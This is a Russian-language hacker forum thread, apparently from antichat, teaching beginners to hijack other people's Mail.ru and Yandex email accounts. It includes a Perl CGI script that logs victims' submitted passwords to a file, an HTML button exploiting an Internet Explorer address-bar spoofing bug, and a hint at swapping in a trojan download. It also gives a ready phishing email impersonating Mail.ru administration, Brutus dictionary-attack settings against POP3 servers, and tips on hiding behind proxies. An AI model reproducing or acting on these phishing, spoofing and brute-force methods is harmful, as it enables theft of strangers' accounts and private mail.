В данной статье я хочу рассказать вам о способах взлома E-mail'a всвязи с очень большим кол-вом сообщений на эту тему: Рассмотрим несколько способов: 1) Баг в IE + Соц. Инженерия 1) Троян 3) Находчивость 4) Грубая сила Вариант 1. Допустим вам известно, что жертва имеет IE и просматривает почту через Web интерфейс, тогда необходимо отправить ей письмо полностью идентичное системе идентификации, например такого вида: http://mail.yandex.ru/login Все надо оставить таким же, вот только написать скрипт, который будет вам отсылать пароли на почту например... Этот скрипт выглядит приблизительно так: &GetFormInput; $name=$field{'name'}; $pass=$field{'pass'}; sub GetFormInput { (*fval) = @_ if @_ ; local ($buf); if ($ENV{'REQUEST_METHOD'} eq 'POST') { read(STDIN,$buf,$ENV{'CONTENT_LENGTH'}); } else { $buf=$ENV{'QUERY_STRING'}; } if ($buf eq "" { return 0 ; } else { @fval=split(/&/,$buf); foreach $i (0 .. $#fval){ ($name,$val)=split (/=/,$fval[$i],2); $val=~tr/+/ /; $val=~ s/%(..)/pack("c",hex($1))/ge; $name=~tr/+/ /; $name=~ s/%(..)/pack("c",hex($1))/ge; if (!defined($field{$name})) { $field{$name}=$val; } else { $field{$name} .= ",$val"; } } } return 1; } open (OUTFILE, ">>pass.txt" print OUTFILE "$name"; print OUTFILE "\n$pass"; print OUTFILE "\n=======END=======\n\n"; close (OUTFILE); print "Location: http://your_redirect_URL\n" А далее необходимо заюзать новый баг в IE с подменой адресной строки... Выглядит это так: <button onclick="location.href=unescape('http://www.microsoft.com@www.antichat.ru ');" style="font: 8pt verdana, sans-serif;" target="_new"> Проверить баг в IE Теперь нажав на эту кнопку в адресной строке будет написано www.microsoft.com , а загрузится наш античат.... Теперь состыковав все эти 3 вещи мы отправляем юзеру письмо, в котором пишем про ошибку аутентификации, а после ввода пароля отправляем его уже на настоящую страницу авторизации... Смысл этого скрипта состоит в том, что если у вас WinXP + MSIE, то в корне диска С запустив такой скрипт вы сможете найти файл nsd_ru_hello.txt Но никто не мешает вам переделать этот скрипт под себя и заставить скачиваться заменяя WMPlayer например)) Это один из эффектнейших способов впаривания трояна.... 3) Находчивость. Рассмотрим момент, ничего не работает, Тогда идем на Секретный вопрос и смотрим туда. Вариант 1. Нормальный вопрос: "Номер телефона" Находим icq этого человека и если он порядочный ламер, то он ввел туда все, что нужно в том числе и свой номер телефона.... Вариант 2. Ненормальный вопрос: "а" Вот тут уже все сложнее, но мне повезло в этом плане, и ответом на вопрос было "б".... 4) Грубая сила. Нет смысла рассуждать на эту тему, берется программа: Brutus aet2 и устанавливается на перебор пароля по 1 логину... ------------------------------------------------------------ Большинство информации взято с сайта www.nsd.ru, так что скажем им "большое спасибо"... Также я взял инфу с хакзоны... Ее разместил dima k-17. ------------------------------------------------------------ Естесственно это далеко не все варианты, но новичкам я рекомендую социальную инженерию... Пишем письмо от админов (н-р: Администрация Mail.ru или Администрация Yandex.ru) . Адрес должен быть соответствующий, а то юзер догадется, если твой мейл будет ded-makar... Допустим, мы зарегистрировали аккаунт типа [email protected], что делаем дальше: Тему ты выбираешь вроде "Подтверждение аккаунта vasja_pupkin" Далее мы пишем: Здравствуйте, Вася Пупкин! С Вашего почтового ящика [email protected] происходит рассылка спама. Возможно, кто-то умышленно рассылает спам от Вашего имени, но Вам нужно подтвердить свои права на этот ящик. Для этого Вам необходимо ответить на это письмо, в теме указав свои реквизиты для [email protected] в формате login;passwd. С уважением, Администрация Mail.ru Для убедительности я переводил на английский. В этом случае пароль высылало ок. 70 %. Как видишь способов придумать можно вагон и маленькую тележку, но главное не переборщить со всем этим делом. Так , однажды, один "умник" написал, что mail.ru похакали и мне срочно нужно выслать пароль. Че Гевара
З.Ы. Чуть не забыл... Всем известен баг в IE эксплорере 6 версии. Так что проще загрузить на комп exe файл, который, как троян, будет высылать вам расшифрованный пасс от мыла. Этот при условии, что юзер использует почтовую программу...
Рассмотрим, как взломать e-mail при помощи Brutus -AET2. Качаем его Отсюда Взламывать другие веб-ресурсы этой программой затруднительно, а для мыла и новичков - самое то! Ну, начнем описание: 1. В поле Target (цель) мы вводим pop3.mail.ru или pop3.yandex.ru соответственно. 2. В Type(тип) мы выбираем pop3 3. Port ставится автоматически 4. Вот теперь приступим к настройкам, которые непосредственно влияют на скорость перебора паролей: Connections(Кол-во одновременных подключений) - я ставлю до 45, а Timeout(Время ожидания, пауза) - на 15. Лично у меня модемное соединение... Насчет выделенки - не знаю. 5. Use Proxy (использовать прокси-сервер) - я вообще не юзаю. А зачем? В лог переборы все-равно не вносятся. 6. Authentication Options (опции аундефикации)- мы ставим галочку на а) Use Username б) Single User 7. В поле userID вписывам нужный ящик - [email protected] 7. Pass Mode - Word list (Перебор по словарю) Pass File - words.txt Я хочу остановиться подробнее на словаре. Стандартный словарь уже не канает, так что надо либо скачивать другой или дополнять старый. Лично я дополнил его паролями вроде 123, 321, 007 и т.п. Все зависит от твоей терпеливости... Допустим, мы взломали мыло. Все - бежим туда! А нет... Не совершайте таких ошибок, которые соваршил я. Обязательно заходите через прокси! В логе остается ip последнего зашедшего через http или pop3. Вроде, я все расписал подробно. Если что-то не понятно, то спрашивайте. Че Гевара
Нет, там другая система... Видишь ли, принцип взлома брутусом состоит в том, что тебя пропускают в сам ящик. Т.е. Ты выбираешь pop3.mail.ru, а при удачном взломе попадаешь в другую дерикторию. То бишь, заход на ящик [email protected] с паролем 123 - удачен. А в системе востановления паролей: 1. Как ты укажешь дату рождения? 2. Он просто не сработает из-за того, что при любом варианте ответа, он пошлет вас на одну и туже страницу... Если ты хочешь взломать мыло через систему восстановления паролей, то попробуй социальную инженерию.
Чем не удобен брутус, так это его списком паролей. Его писали англичане с ориентиром на пассы своих соотечественников. Нужно скачивать другую базу или дополнять "заводскую"